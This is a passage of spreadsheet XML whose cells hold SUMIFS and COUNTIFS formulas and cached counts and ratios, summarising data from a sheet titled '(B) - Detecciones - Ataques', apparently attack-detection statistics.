        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*"))</f>
        <v>0.2</v>
      </c>
      <c r="GA71" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*"))</f>
        <v>0.2</v>
      </c>
      <c r="GB71" s="480"/>
      <c r="GC71" s="379" t="s">
        <v>427</v>
      </c>
      <c r="GD71" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*"))</f>
        <v>0.2</v>
      </c>
      <c r="GE71" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY54)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY54 &amp; "*"))</f>
        <v>0.2</v>
      </c>
      <c r="GF71" s="480"/>
      <c r="GG71" s="480"/>
      <c r="GH71" s="480"/>
      <c r="GI71" s="480"/>
      <c r="GJ71" s="480"/>
      <c r="GK71" s="480"/>
      <c r="GL71" s="480"/>
      <c r="GM71" s="480"/>
      <c r="GN71" s="480"/>
      <c r="GO71" s="480"/>
      <c r="GP71" s="480"/>
      <c r="GQ71" s="480"/>
      <c r="GR71" s="480"/>
      <c r="GS71" s="480"/>
      <c r="GT71" s="480"/>
      <c r="GU71" s="480"/>
      <c r="GV71" s="480"/>
      <c r="GW71" s="480"/>
      <c r="GX71" s="480"/>
      <c r="GY71" s="480"/>
      <c r="GZ71" s="480"/>
      <c r="HA71" s="480"/>
      <c r="HB71" s="480"/>
      <c r="HC71" s="480"/>
      <c r="HD71" s="480"/>
      <c r="HE71" s="480"/>
      <c r="HF71" s="480"/>
      <c r="HG71" s="480"/>
      <c r="HH71" s="480"/>
      <c r="HI71" s="480"/>
      <c r="HJ71" s="480"/>
      <c r="HK71" s="480"/>
      <c r="HL71" s="480"/>
      <c r="HM71" s="480"/>
      <c r="HN71" s="480"/>
      <c r="HO71" s="480"/>
      <c r="HP71" s="480"/>
    </row>
    <row r="72">
      <c r="J72" s="277"/>
      <c r="K72" s="500">
        <f t="shared" ref="K72:N72" si="62">K37/$L$31</f>
        <v>0.01550613762</v>
      </c>
      <c r="L72" s="501">
        <f t="shared" si="62"/>
        <v>0.3831258645</v>
      </c>
      <c r="M72" s="501">
        <f t="shared" si="62"/>
        <v>0.4377701418</v>
      </c>
      <c r="N72" s="502">
        <f t="shared" si="62"/>
        <v>1.834262621</v>
      </c>
      <c r="O72" s="278"/>
      <c r="Q72" s="271"/>
      <c r="R72" s="386" t="s">
        <v>2539</v>
      </c>
      <c r="S72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>10066</v>
      </c>
      <c r="T72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>9998</v>
      </c>
      <c r="U72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>16</v>
      </c>
      <c r="V72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="W72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Y72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>792</v>
      </c>
      <c r="Z72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>7634</v>
      </c>
      <c r="AA72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>25</v>
      </c>
      <c r="AB72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>20</v>
      </c>
      <c r="AC72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="AD72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>1773</v>
      </c>
      <c r="AE72" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>53</v>
      </c>
      <c r="AF72" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="AG72" s="271"/>
      <c r="AH72" s="386" t="s">
        <v>2539</v>
      </c>
      <c r="AI72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>10064</v>
      </c>
      <c r="AJ72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>1</v>
      </c>
      <c r="AL72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>9998</v>
      </c>
      <c r="AN72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>3</v>
      </c>
      <c r="AR72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>4</v>
      </c>
      <c r="AS72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>3</v>
      </c>
      <c r="AU72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>4</v>
      </c>
      <c r="AV72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>8</v>
      </c>
      <c r="AY72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>0</v>
      </c>
      <c r="BA72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>792</v>
      </c>
      <c r="BI72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>0</v>
      </c>
      <c r="BM72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>658</v>
      </c>
      <c r="BN72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>6976</v>
      </c>
      <c r="BO72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>0</v>
      </c>
      <c r="BT72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>20</v>
      </c>
      <c r="CA72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>0</v>
      </c>
      <c r="CG72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>8</v>
      </c>
      <c r="CL72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>3</v>
      </c>
      <c r="CN72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>1</v>
      </c>
      <c r="CP72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>23</v>
      </c>
      <c r="CQ72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>1771</v>
      </c>
      <c r="CT72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>2</v>
      </c>
      <c r="CU72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
